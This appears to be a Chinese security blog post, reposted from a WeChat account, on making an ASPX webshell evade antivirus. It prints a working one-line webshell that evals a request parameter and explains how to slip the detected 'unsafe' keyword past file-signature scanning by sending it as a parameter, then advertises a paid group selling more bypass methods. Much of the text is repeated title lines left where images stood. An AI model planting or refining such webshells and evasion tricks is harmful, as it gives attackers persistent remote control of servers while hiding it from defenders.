【免杀】webshell多参数免杀

admin 2024年7月18日13:30:03评论35 views字数 546阅读1分49秒阅读模式

0x00 免责声明

!

【免杀】webshell多参数免杀

使

0x01aspx简单一句话

!

【免杀】webshell多参数免杀
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
【免杀】webshell多参数免杀

【免杀】webshell多参数免杀

【免杀】webshell多参数免杀

【免杀】webshell多参数免杀

拿到简单一句话木马,经过测试基本上已经被所有安全设备盯上了特征

0x02
二次开发思路分享

!

【免杀】webshell多参数免杀
【免杀】webshell多参数免杀
首先通过特征查找

【免杀】webshell多参数免杀

查找发现特征在于"unsafe"字符串,找到特征后就可以打开思路,对于webshell来说查杀重点在于特征查杀特征查杀就是针对落地后的文件进行字符串扫描或一些特征函数查杀,哪我们就可以考虑直接把特征的函数或字符串通过连接工具传进去,文件落地的时候就扫不到特征。

0x03研究成果

!

【免杀】webshell多参数免杀

【免杀】webshell多参数免杀

看源码就是直接通过传递参数绕过特征查杀

【免杀】webshell多参数免杀

 【免杀】webshell多参数免杀

【免杀】webshell多参数免杀

【免杀】webshell多参数免杀

思路已经告诉大家了,欢迎进圈子或群聊探讨学习研究更多方式方法。
0x04 欢迎进入圈子获取工具

!

【免杀】webshell多参数免杀

各种webshell绕过方式发布到纷传圈子欢迎进圈子一起学习交流、共同进步,师傅们要进的抓紧哦!后续价格只增不减,错过机会难再遇哦!

【免杀】webshell多参数免杀
0x05 欢迎进群交流

!

【免杀】webshell多参数免杀

添加微信进群:

【免杀】webshell多参数免杀

原文始发于微信公众号(网安鲲为帝):【免杀】webshell多参数免杀

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月18日13:30:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【免杀】webshell多参数免杀https://cn-sec.com/archives/2968654.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息